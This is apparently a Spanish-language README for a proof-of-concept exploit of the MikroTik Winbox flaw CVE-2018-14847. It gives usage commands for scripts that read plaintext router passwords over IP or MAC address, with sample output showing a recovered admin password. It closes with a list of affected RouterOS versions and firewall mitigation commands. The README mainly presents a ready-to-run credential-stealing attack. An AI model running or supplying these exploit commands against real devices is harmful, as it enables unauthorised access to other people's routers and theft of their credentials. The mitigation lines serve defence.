
Prueba de concepto de la vulnerabilidad crítica de Winbox (CVE-2018-14847)
Esta es una prueba de concepto de la vulnerabilidad crítica de WinBox (CVE-2018-14847) que permite la lectura arbitraria de archivos de contraseñas en texto plano.
Este script NO se ejecutará con Python 2.x o inferior.
El script se usa de manera simple con argumentos simples en la línea de comandos.
Explota la vulnerabilidad y lee la contraseña.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Ejemplo:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
Puedes extraer archivos incluso si el dispositivo no tiene una dirección IP.
Verificación de descubrimiento simple para dispositivos Mikrotik conectados localmente.
python3 MACServerDiscover.py
Ejemplo:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Explota la vulnerabilidad y lee la contraseña.
python3 MACServerExploit.py <MAC-ADDRESS>
Ejemplo:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Todas las versiones de RouterOS desde el 2015-05-28 hasta el 2018-04-20 son vulnerables a este exploit.
Dispositivos Mikrotik que ejecutan versiones de RouterOS:
Para más información ver: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox